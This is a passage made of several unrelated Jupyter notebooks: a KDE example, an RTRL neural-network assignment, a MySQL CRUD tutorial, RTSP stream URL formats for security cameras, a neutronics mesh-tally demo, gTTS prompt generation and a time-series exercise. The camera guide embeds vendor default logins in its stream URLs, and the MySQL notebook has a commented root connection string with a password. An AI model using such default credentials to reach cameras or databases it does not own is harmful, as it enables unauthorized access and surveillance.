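    # h = 0.9 * min(std, IQR / 1.34) * n^(-1/5)
    # derived for roughly normal data -- hence too wide for multimodal samples
    sample = np.asarray(sample)
    iqr = np.subtract(*np.percentile(sample, [75, 25]))
    return 0.9 * min(sample.std(ddof=1), iqr / 1.34) * sample.size ** (-0.2)

rng = np.random.default_rng(1)
unimodal = rng.normal(size=30000)
bimodal = np.concatenate([rng.normal(size=15000), rng.normal(size=15000) + 10])

# the bimodal sample's large overall spread inflates the bandwidth several-fold
print(silverman_bandwidth(unimodal), silverman_bandwidth(bimodal))
```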
```
# to demonstrate, let's create a new sample:
N = 30000
sample = zeros(N)
sample[:N//3] = normal(size=N//3)
sample[N//3:] = normal(size=2*(N//3)) + 10
# now construct estimators using the simple and cross-validation estimators
pdf_simple = GaussianKDE(sample)
pdf_crossval = GaussianKDE(sample, cross_validation = True)
# now build an axis on which to evaluate the estimates
x = linspace(-4,14,500)
# for comparison also compute the real distribution
exact = (exp(-0.5*x**2)/3 + 2*exp(-0.5*(x-10)**2)/3)/sqrt(2*pi)
# plot everything together
plt.plot(x, pdf_simple(x), label = 'simple')
plt.plot(x, pdf_crossval(x), label = 'cross-validation')
plt.plot(x, exact, label = 'exact')
plt.ylabel('probability density')
plt.xlabel('x')
plt.grid()
plt.legend()
plt.show()
```
## Functional density estimation for unimodal PDFs
If we know that the distribution being estimated is a single (but potentially highly skewed) peak, the `UnimodalPdf` class can robustly estimate the PDF even at smaller sample sizes. It works by fitting a heavily modified Student-t distribution to the sample data.
```
# Create some samples from the exponentially-modified Gaussian distribution
L = 0.3 # decay constant of the exponential distribution
sample = normal(size = 3000) + exponential(scale = 1./L, size = 3000)
# create an instance of the density estimator
from inference.pdf import UnimodalPdf
PDF = UnimodalPdf(sample)
# plot the estimate along with the exact PDF for comparison
x = linspace(-5, 15, 1000)
exact = 0.5*L*exp(0.5*L*(L-2*x))*erfc((L-x)/sqrt(2)) # exact PDF for the exp-gaussian distribution
plt.plot(x, PDF(x), label = 'UnimodalPdf estimate', lw = 3)
plt.plot(x, exact, label = 'exact distribution', ls = 'dashed', lw = 3)
plt.ylabel('probability density')
plt.xlabel('x')
plt.legend()
plt.grid()
plt.tight_layout()
plt.show()
```
|
github_jupyter
|
# Assignment 3: RTRL
Implement an RNN trained with RTRL. The ds/dW partial derivative is stored as a 2D array of shape (n_hidden, n_hidden * n_input) instead of as a 3D tensor.
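The 2D bookkeeping rests on laying out the immediate Jacobian `∂s_i/∂W_jk = δ_ij · x_k` with `np.kron`, mirroring the `ds_dW` update inside `forward()` below. A standalone shape check:

```python
import numpy as np

n_hidden, n_input = 5, 2
x = np.random.normal(size=(1, n_input))   # one input row, as in forward()

# kron(I, x) places a copy of x on the "diagonal" blocks, flattening the
# (n_hidden, n_hidden, n_input) tensor into (n_hidden, n_hidden * n_input)
dW_immediate = np.kron(np.eye(n_hidden), x)
print(dW_immediate.shape)  # (5, 10)

# row i is zero except for columns [i*n_input, (i+1)*n_input), which hold x
assert np.allclose(dW_immediate[1, n_input:2 * n_input], x[0])
```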
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
class RNN(object):
def __init__(self, n_input, n_hidden, n_output):
# init weights and biases
self.n_input = n_input
self.n_hidden = n_hidden
self.n_output = n_output
self.W = np.random.normal(scale=0.1, size=(n_hidden, n_input))
self.R = np.eye(n_hidden)
self.V = np.random.normal(scale=0.1, size=(n_output, n_hidden))
self.bh = np.zeros((n_hidden, 1))
self.bo = np.zeros((n_output, 1))
self.grad = {}
self.reset()
def reset(self):
# init hidden activation
self.s = np.zeros((self.n_hidden, 1))
self.a = np.zeros((self.n_hidden, 1))
# init buffers for recursive gradients
self.ds_dW = np.zeros((self.n_hidden, self.n_hidden * self.n_input))
self.ds_dR = np.zeros((self.n_hidden, self.n_hidden * self.n_hidden))
self.ds_db = np.zeros((self.n_hidden, self.n_hidden))
def forward(self, x):
assert x.shape[1] == self.n_input
assert len(x.shape) == 2
"""your code goes here, method must return model's prediction"""
# partial derivative for accumulation. this is the R * f' * f that can be reused
der = self.R * np.tile(1-self.a**2, self.n_hidden)
# accumulate gradients
self.ds_dW = der @ self.ds_dW + np.kron(np.eye(self.n_hidden), x)
self.ds_dR = der @ self.ds_dR + np.kron(np.eye(self.n_hidden), self.a.T)
self.ds_db = der @ self.ds_db + np.eye(self.n_hidden)
# do regular 1 step forward pass
self.s = self.W @ x.T + self.R @ self.a + self.bh
self.a = np.tanh(self.s) # can be reused in backward pass
return (self.V @ self.a + self.bo).T
def backward(self, y_hat, y):
assert y_hat.shape[1] == self.n_output
assert len(y_hat.shape) == 2
assert y_hat.shape == y.shape, f"shape mismatch {y_hat.shape} {y.shape}"
e = (y_hat - y).T # error == dL/dy_hat
dL_ds = ((self.V.T @ e) * (1 - self.a**2)) # transposed to fit shape
# 1:1 copy from ex1, only depend on error
self.grad["bo"] = e
self.grad["V"] = e @ self.a.T
# collect new gradients
self.grad["W"] = (self.ds_dW.T @ dL_ds).reshape(self.W.shape)
self.grad["R"] = (self.ds_dR.T @ dL_ds).reshape(self.R.shape).T
self.grad["bh"]= self.ds_db.T @ dL_ds
# compute loss (halved squared error)
return np.sum(0.5 * (y - y_hat)**2)
def fast_forward(self, x_seq):
# this is a forward pass without gradient computation for gradient checking
s = np.zeros_like(self.s)
for x in x_seq:
s = self.W @ x.reshape(*x.shape, 1) + self.R.T @ np.tanh(s) + self.bh
return self.V @ np.tanh(s) + self.bo
def gradient_check(self, x, y, eps=1e-5, thresh=1e-5, verbose=True):
for name, ga in self.grad.items():
if verbose:
print("weight\t",name)
gn = np.zeros_like(ga)
w = self.__dict__[name]
for idx, w_orig in np.ndenumerate(w):
w[idx] = w_orig + eps/2
hi = np.sum(0.5 * (y - self.fast_forward(x))**2)
w[idx] = w_orig - eps/2
lo = np.sum(0.5 * (y - self.fast_forward(x))**2)
w[idx] = w_orig
gn[idx] = (hi - lo) / eps
dev = abs(gn[idx] - ga[idx])
if verbose: # extended error
print(f"numeric {gn[idx]}\tanalytic {ga[idx]}\tdeviation {dev}")
assert dev < thresh
def update(self, eta):
# update weights
for name, grad in self.grad.items():
self.__dict__[name] -= eta * grad
def generate_samples(seq_length, batch_size, input_size):
while True:
x = np.random.uniform(low=-1, high=1, size=(seq_length, batch_size, input_size))
y = x[0,:,:]
yield x, y
def check_gradients():
rnn = RNN(2, 5, 2)
data = generate_samples(seq_length=10, batch_size=1, input_size=2)
for i, (x, y) in zip(range(1), data):
rnn.reset()
for x_t in x:
y_hat = rnn.forward(x_t)
rnn.backward(y_hat, y)
rnn.gradient_check(x, y.T)
check_gradients()
```
# Train gradient and plot weights
```
def train():
iter_steps = 15000
lr = 1e-2
seq_length = 5
rnn = RNN(1, 10, 1)
data = generate_samples(seq_length=seq_length, batch_size=1, input_size=1)
loss = []
for i, (x, y) in zip(range(iter_steps), data):
rnn.reset()
for x_t in x:
y_hat = rnn.forward(x_t)
loss.append(rnn.backward(y_hat, y))
rnn.update(lr)
# plot learning curve
plt.title('sequence length %d' % seq_length)
plt.plot(range(len(loss)), loss)
plt.show()
train()
```
|
github_jupyter
|
===============================
### IMPORTS & GET DATABASE INFO
```
from jsons import read_json_to_dict
from mysql_driver import MySQL
import pandas as pd
from sqlalchemy import create_engine
json_readed = read_json_to_dict("sql_server_settings.json")
IP_DNS = json_readed["IP_DNS"]
USER = json_readed["USER"]
PASSWORD = json_readed["PASSWORD"]
BD_NAME = json_readed["BD_NAME"]
PORT = json_readed["PORT"]
# Connect to MySQL
mysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)
mysql_db.connect()
```
==============
### DROP TABLE
```
# Drop table if it already exist using execute() method.
#mysql_db.cursor.execute("DROP TABLE IF EXISTS people")
mysql_db.execute_interactive_sql(sql="DROP TABLE IF EXISTS people")
```
==============
### CREATE TABLE
```
# Create table as per requirement
create_table_sql = """CREATE TABLE people(
ID INT(11) NOT NULL AUTO_INCREMENT,
MOMENTO TIMESTAMP NOT NULL,
NOMBRE VARCHAR(20) NOT NULL,
APELLIDOS VARCHAR(100) NOT NULL,
DIRECCION VARCHAR(50),
EDAD INT,
NOTA VARCHAR(40),
PRIMARY KEY (ID))"""
mysql_db.execute_interactive_sql(sql=create_table_sql)
```
==============
### SELECT TABLE
```
# Select
select_sql = """SELECT * FROM people"""
select_result = mysql_db.execute_get_sql(sql=select_sql)
# tuple of tuples
type(select_result)
select_result
```
==============
### INSERT TABLE
```
# Insert
to_insert_1 = ["Pepito", "Wolfram_Eustaquio", "Calle Bellavista 9º-B", "67", "Enfermedad: Ceguera"]
to_insert_2 = ["Juanita", "Data Science", "Calle Recoletos", "15", "Está muy alegre siempre"]
sql_to_insert_1 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_1)
sql_to_insert_2 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_2)
sql_to_insert_1
# Another way to insert
mysql_db.execute_interactive_sql(sql="""INSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')""")
mysql_db.execute_interactive_sql(sql=sql_to_insert_1)
mysql_db.execute_interactive_sql(sql=sql_to_insert_2)
```
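The helper methods above build INSERT statements as plain strings; with any DB-API driver (pymysql included) it is generally safer to pass the values as parameters so the driver handles quoting and escaping. A sketch of the same insert using parameterized queries, shown here with the stdlib `sqlite3` driver so it runs standalone (the table is a simplified stand-in; MySQL drivers use `%s` placeholders instead of `?`):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE people (
    ID INTEGER PRIMARY KEY AUTOINCREMENT,
    NOMBRE TEXT NOT NULL,
    APELLIDOS TEXT NOT NULL,
    DIRECCION TEXT,
    EDAD INTEGER,
    NOTA TEXT)""")

insert_sql = """INSERT INTO people (NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA)
                VALUES (?, ?, ?, ?, ?)"""  # pymysql would use %s here
row = ("Pepito", "Wolfram_Eustaquio", "Calle Bellavista 9º-B", 67, "Enfermedad: Ceguera")
conn.execute(insert_sql, row)  # the driver escapes the values for us
conn.commit()

print(conn.execute("SELECT NOMBRE, EDAD FROM people").fetchall())
```

Besides avoiding quoting bugs, parameterization also closes off SQL injection when the values come from user input.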
=====================
### SELECT COLUMNS
```
select_sql = """SELECT * FROM people"""
select_result = mysql_db.execute_get_sql(sql=select_sql)
select_result
```
### Select with pandas
```
import pymysql
mysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)
# Version 1
db = mysql_db.connect()
df = pd.read_sql("select * from people", con=db)
df
# Version 2
db_connection_str = mysql_db.SQL_ALCHEMY
#string = 'mysql+pymysql://root:test@98.76.54.32:20001/datasciencetb_db'
db_connection = create_engine(db_connection_str)
df = pd.read_sql("select * from people", con=db_connection)
pd.set_option('display.expand_frame_repr', False)
df
```
### Insert from pandas
```
table_to_insert = "people"
df_to_insert = df.drop(columns=["ID"])
# if_exists has two options:
to_append = "append"
to_replace = "replace"
try:
frame_sql = df_to_insert.to_sql(name=table_to_insert, con=db_connection, if_exists="append", index=False)
print("Success")
except Exception as error:
print(error)
```
=============================
### Drop row
```
sql_drop = """DELETE FROM people WHERE NOMBRE='Pepito';"""
mysql_db.execute_interactive_sql(sql=sql_drop)
```
=============================
### Update row
```
#CRUD:
#Create
#Replace
#Update
#Delete
sql_update = """UPDATE people set EDAD=102 WHERE NOMBRE='Juanita';"""
mysql_db.execute_interactive_sql(sql=sql_update)
mysql_db.close()
```
### Example: working directly with pandas
```
# Version 2
db_connection_str = mysql_db.SQL_ALCHEMY
#string = 'mysql+pymysql://root:test@98.76.54.32:20001/datasciencetb_db'
#db_connection = create_engine(string)
db_connection = create_engine(db_connection_str)
df1 = pd.read_sql("select * from people", con=db_connection)
df1
df1 = df1[df1.ID <= 5]
df1
# Example
table_to_insert = "people"
to_append = "append"
to_replace = "replace"
try:
frame_sql = df1.to_sql(name="people", con=db_connection, if_exists="replace", index=False)
print("Success")
except Exception as error:
print(error)
```
### Interacting directly with the database without going through pandas
```
sql2 = """DELETE FROM people WHERE ID>5;"""
mysql_db.execute_interactive_sql(sql=sql2)
```
# RTSP URL formats for major camera brands
## Hikvision
### IPC cameras
>rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream
Parameters:
- username: user name, e.g. admin.
- password: password, e.g. 12345.
- ip: device IP, e.g. 192.0.0.64.
- port: port number; defaults to 554 and may be omitted if the default is used.
- codec: one of h264, MPEG-4, or mpeg4.
- channel: channel number, starting at 1; channel 1 is ch1, for example.
- subtype: stream type; main for the main stream, sub for the sub stream.
**Example**: to request the main stream of channel 1 on a Hikvision camera, the URLs are:
Main stream:
- rtsp://admin:12345@192.0.0.64:554/h264/ch1/main/av_stream
- rtsp://admin:12345@192.0.0.64:554/MPEG-4/ch1/main/av_stream
Sub stream:
- rtsp://admin:12345@192.0.0.64/mpeg4/ch1/sub/av_stream
- rtsp://admin:12345@192.0.0.64/h264/ch1/sub/av_stream
### NVR
Newer Hikvision firmware, DS series:
> rtsp://username:password@<address>:<port>/Streaming/Channels/<id>(?parm1=value1&parm2=value2…)
Examples:
Main stream of IP channel 01 on a DS-9632N-ST:
rtsp://admin:12345@172.6.22.234:554/Streaming/Channels/101?transportmode=unicast
Main stream of IP channel 01 on a DS-9016HF-ST:
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/1701?transportmode=unicast
Sub stream of analog channel 01 on a DS-9016HF-ST:
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/102?transportmode=unicast (unicast)
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/102?transportmode=multicast (multicast)
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/102 (the query string may be omitted; unicast is the default)
Main stream of the zero channel on a DS-9016HF-ST (the zero channel has no sub stream):
rtsp://admin:12345@172.6.22.106:554/Streaming/Channels/001
Third stream of a DS-2DF7274-A:
rtsp://admin:12345@172.6.10.11:554/Streaming/Channels/103
More information: https://blog.csdn.net/xiejiashu/article/details/71786187
## Dahua
>rtsp://[username]:[password]@[ip]:[port]/cam/realmonitor?[channel]&[subtype]
Parameters:
- username: user name, e.g. admin.
- password: password, e.g. admin.
- ip: device IP, e.g. 10.7.8.122.
- port: port number; defaults to 554 and may be omitted if the default is used.
- channel: channel number, starting at 1; channel 2 is channel=2, for example.
- subtype: stream type; 0 for the main stream (subtype=0), 1 for the sub stream (subtype=1).
**Example**: to request the sub stream of channel 2 on a device, the URL is
rtsp://admin:admin@10.12.4.84:554/cam/realmonitor?channel=2&subtype=1
## D-Link
>rtsp://[username]:[password]@[ip]:[port]/[channel].sdp
Parameters:
- username: user name, e.g. admin.
- password: password, e.g. 12345; if no authentication is required, the URL can be written as rtsp://[ip]:[port]/[channel].sdp
- ip: device IP, e.g. 192.168.0.108.
- port: port number; defaults to 554 and may be omitted if the default is used.
- channel: channel number, starting at 1; channel 2 is live2, for example.
**Example**: to request the stream of channel 2 on a device, the URL is
rtsp://admin:12345@192.168.200.201:554/live2.sdp
## Axis
>rtsp://[username]:[password]@[ip]/axis-media/media.amp?[videocodec]&[resolution]
Parameters:
- username: user name, e.g. admin.
- password: password, e.g. 12345; if no authentication is required, the username, password, and @ character may be omitted.
- ip: device IP, e.g. 192.168.0.108.
- videocodec: MPEG, h.264, etc.; may be omitted.
- resolution: e.g. resolution=1920x1080; may be omitted to use the default resolution.
**Example**: to request an h264-encoded 1280x720 stream, the URL is:
rtsp://192.168.200.202/axis-media/media.amp?videocodec=h264&resolution=1280x720
---
Sources:
- https://blog.csdn.net/viola_lulu/article/details/53330727
- https://blog.csdn.net/xiejiashu/article/details/71786187
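These patterns are just string templates, so they are easy to assemble programmatically. A small helper for two of the vendors (the credentials and IPs are the placeholder examples used above):

```python
def hikvision_ipc_url(user, password, ip, channel=1, subtype="main",
                      codec="h264", port=554):
    """Build a Hikvision IPC RTSP URL following the pattern above."""
    return (f"rtsp://{user}:{password}@{ip}:{port}"
            f"/{codec}/ch{channel}/{subtype}/av_stream")

def dahua_url(user, password, ip, channel=1, subtype=0, port=554):
    """Build a Dahua RTSP URL following the pattern above."""
    return (f"rtsp://{user}:{password}@{ip}:{port}"
            f"/cam/realmonitor?channel={channel}&subtype={subtype}")

print(hikvision_ipc_url("admin", "12345", "192.0.0.64"))
# rtsp://admin:12345@192.0.0.64:554/h264/ch1/main/av_stream
print(dahua_url("admin", "admin", "10.12.4.84", channel=2, subtype=1))
# rtsp://admin:admin@10.12.4.84:554/cam/realmonitor?channel=2&subtype=1
```

The resulting URL can then be handed to any RTSP client, for example `cv2.VideoCapture(url)` in OpenCV.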
# Heating Mesh Tally on CAD geometry made from Shapes
This constructs a reactor geometry from 3 Shape objects each made from points.
The Shapes made include a breeder blanket, PF coil and a central column shield.
2D and 3D mesh tallies are then simulated to show nuclear heating, flux and tritium production across the model.
This makes a 3D geometry and material for PF coil
```
import paramak
pf_coil = paramak.RotateStraightShape(
points=[
(700, 0),
(750, 0),
(750, 50),
(700, 50)
],
stp_filename = 'pf_coil.stp',
material_tag = 'pf_coil_material'
)
pf_coil.solid
```
This makes a 3D geometry and material for the centre column
```
center_column = paramak.RotateMixedShape(
points=[
(50, 600, 'straight'),
(150, 600, 'spline'),
(100, 0, 'spline'),
(150, -600, 'straight'),
(50, -600, 'straight')
],
stp_filename = 'center_column.stp',
material_tag = 'center_column_material'
)
center_column.solid
```
This makes a 3D geometry and material for breeder blanket. The azimuth_placement_angle argument is used to repeat the geometry around the Z axis at specified angles.
```
blanket = paramak.RotateSplineShape(
points=[
(600, 0),
(600, -20),
(500, -300),
(400, -300),
(400, 0),
(400, 300),
(500, 300),
(600, 20)
],
rotation_angle=40,
azimuth_placement_angle=[0, 45, 90, 135, 180, 225, 270, 315],
stp_filename = 'blanket.stp',
material_tag = 'blanket_material'
)
blanket.solid
```
This makes a reactor object from the three components
```
my_reactor = paramak.Reactor([blanket, pf_coil,center_column])
my_reactor.solid
```
At this stage we can export the reactor geometry as stp files and make them available for download and viewing in FreeCAD.
```
my_reactor.export_stp()
from IPython.display import FileLink
display(FileLink('blanket.stp'))
display(FileLink('pf_coil.stp'))
display(FileLink('center_column.stp'))
display(FileLink('Graveyard.stp'))
```
The next section defines the materials. This can be done using openmc.Materials or in this case strings that look up materials from the neutronics material maker.
```
from neutronics_material_maker import Material
mat1 = Material(material_name='Li4SiO4',
material_tag='blanket_material')
mat2 = Material(material_name='copper',
material_tag='pf_coil_material')
mat3 = Material(material_name='WC',
material_tag='center_column_material')
```
This next step makes a simple point source
```
import openmc
# initialises a new source object
source = openmc.Source()
# sets the location of the source to x=0 y=0 z=0
source.space = openmc.stats.Point((100, 0, 0))
# sets the direction to isotropic
source.angle = openmc.stats.Isotropic()
# sets the energy distribution to 100% 14MeV neutrons
source.energy = openmc.stats.Discrete([14e6], [1])
```
This next section combines the geometry with the materials and specifies a few mesh tallies
```
neutronics_model = paramak.NeutronicsModel(
geometry=my_reactor,
mesh_tally_2d=['heating', 'flux', '(n,Xt)'],
mesh_tally_3d=['heating', 'flux', '(n,Xt)'],
source=source,
simulation_batches=10,
simulation_particles_per_batch=1000,
materials={
'blanket_material': mat1,
'pf_coil_material': mat2,
'center_column_material': mat3,
}
)
neutronics_model.simulate()
```
The next section produces download links for:
- vtk files that contain the 3D mesh results (open with Paraview)
- png images that show the results of the 2D mesh tally
```
from IPython.display import FileLink
display(FileLink('heating_on_3D_mesh.vtk'))
display(FileLink('flux_on_3D_mesh.vtk'))
display(FileLink('tritium_production_on_3D_mesh.vtk'))
display(FileLink('flux_on_2D_mesh_xy.png'))
display(FileLink('flux_on_2D_mesh_xz.png'))
display(FileLink('flux_on_2D_mesh_yz.png'))
display(FileLink('heating_on_2D_mesh_xy.png'))
display(FileLink('heating_on_2D_mesh_xz.png'))
display(FileLink('heating_on_2D_mesh_yz.png'))
display(FileLink('tritium_production_on_2D_mesh_xy.png'))
display(FileLink('tritium_production_on_2D_mesh_xz.png'))
display(FileLink('tritium_production_on_2D_mesh_yz.png'))
```
```
from gtts import gTTS
LANG_PATH = '../lang/{0}/speech/{1}.mp3'
tts = gTTS(text='Se ha detectado más de una persona, inténtelo de nuevo con una persona sólo por favor', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'more_than_one_face'))
tts = gTTS(text='There appears to be more than one person, try again with one person only please', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'more_than_one_face'))
tts = gTTS(text='ha sido guardado correctamente', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'saved'))
tts = gTTS(text='has been saved correctly', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'saved'))
tts = gTTS(text='diga el nombre de la persona detectada o cancelar después del pitido por favor', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'who'))
tts = gTTS(text='say the name of the person detected or cancel after the beep please', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'who'))
tts = gTTS(text='guardando', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'saving'))
tts = gTTS(text='saving', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'saving'))
tts = gTTS(text='un momento por favor', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'one_moment'))
tts = gTTS(text='one moment please', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'one_moment'))
tts = gTTS(text='lo siento, no he entendido bien', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'not_understand'))
tts = gTTS(text="sorry, I didn't catch that", lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'not_understand'))
tts = gTTS(text='cancelado', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'canceled'))
tts = gTTS(text='canceled', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'canceled'))
tts = gTTS(text='seleccione una opción. O diga: Comandos. Para oir una lista de comandos sonoros. O: Teclas. Para oir una lista de comandos de entrada.', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'choose'))
tts = gTTS(text='select an option. Or say Options to hear a list of available commands. Or say Keys to hear a list of available keys', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'choose'))
tts = gTTS(text='seleccione una opción', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'choose_short'))
tts = gTTS(text='select an option', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'choose_short'))
tts = gTTS(text='Diga: ¿Quién? Para obtener una descripción de las personas en la imagen. Diga: ¿Qué? Para obtener una descripción general de la imagen. Diga: Guardar. Para guardar en el sistema el nombre de la persona en la imagen. Diga: Idioma. Para cambiar el idioma al siguiente disponible. Diga: Cancelar. Para continuar o diga: Repetir: Para repetir las opciones. ', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'commands'))
tts = gTTS(text='Say: Who. To get a description of the people in the image. Say: What. To get a general description of the image. Say: Save. To save the name of the person in the image. Say: Language. To change the language. Say: Cancel. To continue. Say: Repeat. To repeat the list of available options', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'commands'))
tts = gTTS(text='Pulse "A". Para obtener una descripción de las personas en la imagen. Pulse "Z". Para obtener una descripción general de la imagen. Pulse "S". Para guardar en el sistema el nombre de la persona en la imagen. Pulse "L". Para cambiar el idioma al siguiente disponible. Pulse "Q". Para continuar o pulse: "R": Para repetir las opciones. ', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'keys'))
tts = gTTS(text='Press "A". To get a description of the people in the image. Press "Z". To get a general description of the image. Press "S". To save the name of the person in the image. Press "L". To change the language. Press "Q". To continue. Press "R". To repeat the list of available options', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'keys'))
tts = gTTS(text='Idioma cambiado a español', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'lang_change'))
tts = gTTS(text='Language has been changed to english', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'lang_change'))
tts = gTTS(text='De acuerdo', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'ok'))
tts = gTTS(text='OK', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'ok'))
tts = gTTS(text='Lo siento, no te he entendido', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'sorry_understand'))
tts = gTTS(text='Sorry, I did not get that', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'sorry_understand'))
tts = gTTS(text='¿Quieres que repita las opciones disponibles?', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'repeat_options'))
tts = gTTS(text='Do you want me to repeat the available options?', lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'repeat_options'))
tts = gTTS(text='Lo siento, no soy capaz de describir la imagen', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'no_image'))
tts = gTTS(text="Sorry, I cannot understand what's in the image", lang='en', slow=False)
tts.save(LANG_PATH.format('en', 'no_image'))
from gtts import gTTS
tts = gTTS(text='Pulse, A. Para obtener una descripción de las personas en la imagen. Pulse "Z". Para obtener una descripción general de la imagen. Pulse "S". Para guardar en el sistema el nombre de la persona en la imagen. Pulse "L". Para cambiar el idioma al siguiente disponible. Pulse "Q". Para continuar o pulse: "R": Para repetir las opciones. ', lang='es', slow=False)
tts.save(LANG_PATH.format('es', 'keys'))
words = ['man', 'woman', 'angry', 'disgust', 'happy', 'neutral', 'sad', 'surprise']
words_es_h = ['hombre', 'mujer', 'enfadado', 'asqueado', 'contento', 'neutral', 'triste', 'sorprendido']
words_es_m = ['hombre', 'mujer', 'enfadada', 'asqueada', 'contenta', 'neutral', 'triste', 'sorprendida']
for i in range(len(words)):
tts = gTTS(text=words[i], lang='en', slow=False)
tts.save("en/" + words[i] + ".wav")
tts = gTTS(text=words_es_h[i], lang='es', slow=False)
tts.save("esh/" + words[i] + ".wav")
tts = gTTS(text=words_es_m[i], lang='es', slow=False)
tts.save("esm/" + words[i] + ".wav")
```
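The repeated `gTTS(...)` / `save(...)` pairs above could be collapsed into a small helper. In this sketch the synthesizer class is passed in explicitly, purely so the example can run without network access; with the real `gTTS` class the call works the same way:

```python
LANG_PATH = '../lang/{0}/speech/{1}.mp3'

def save_phrase(text, lang, name, synth, path_template=LANG_PATH):
    """Synthesize one phrase and save it under the per-language path."""
    tts = synth(text=text, lang=lang, slow=False)
    target = path_template.format(lang, name)
    tts.save(target)
    return target

# Stand-in synthesizer used only for this demonstration.
class FakeTTS:
    def __init__(self, text, lang, slow):
        self.text, self.lang = text, lang
    def save(self, path):
        self.saved_to = path  # a real gTTS object would write an mp3 here

made = save_phrase('saving', 'en', 'saving', synth=FakeTTS)
print(made)  # ../lang/en/speech/saving.mp3
```

With the helper, each phrase becomes a single line such as `save_phrase('un momento por favor', 'es', 'one_moment', synth=gTTS)`.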
<a href="https://colab.research.google.com/github/MoRebaie/Sequences-Time-Series-Prediction-in-Tensorflow/blob/master/Course_4_Week_1_Exercise_Question.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
!pip install tensorflow==2.0.0b1
import tensorflow as tf
print(tf.__version__)
# EXPECTED OUTPUT
# 2.0.0-beta1 (or later)
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import keras
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
def trend(time, slope=0):
return slope * time
def seasonal_pattern(season_time):
"""Just an arbitrary pattern, you can change it if you wish"""
return np.where(season_time < 0.1,
np.cos(season_time * 7 * np.pi),
1 / np.exp(5 * season_time))
def seasonality(time, period, amplitude=1, phase=0):
"""Repeats the same pattern at each period"""
season_time = ((time + phase) % period) / period
return amplitude * seasonal_pattern(season_time)
def noise(time, noise_level=1, seed=None):
rnd = np.random.RandomState(seed)
return rnd.randn(len(time)) * noise_level
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.01
noise_level = 2
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
plt.figure(figsize=(10, 6))
plot_series(time, series)
plt.show()
# EXPECTED OUTPUT
# Chart as in the screencast. First should have 5 distinctive 'peaks'
```
Now that we have the time series, let's split it so we can start forecasting
```
split_time = 1100 # YOUR CODE HERE
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
plt.figure(figsize=(10, 6))
plot_series(time_train, x_train)
plt.show()
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plt.show()
# EXPECTED OUTPUT
# Chart WITH 4 PEAKS between 50 and 65 and 3 troughs between -12 and 0
# Chart with 2 Peaks, first at slightly above 60, last at a little more than that, should also have a single trough at about 0
```
# Naive Forecast
```
naive_forecast = series[split_time - 1:-1]  # YOUR CODE HERE
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, naive_forecast)
# Expected output: Chart similar to above, but with forecast overlay
```
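The slice `series[split_time - 1:-1]` implements the one-step shift: the forecast for each validation step is simply the previous observed value. On a tiny array (the values here are made up for illustration):

```python
import numpy as np

toy = np.array([10., 11., 12., 13., 14.])
split = 2
valid = toy[split:]        # [12., 13., 14.] -- the validation values
naive = toy[split - 1:-1]  # [11., 12., 13.] -- each forecast lags by one step
print(valid, naive)
```

Both slices have the same length, so the metrics below can compare them element-wise.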
Let's zoom in on the start of the validation period:
```
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid, start = 0, end = 150)# YOUR CODE HERE
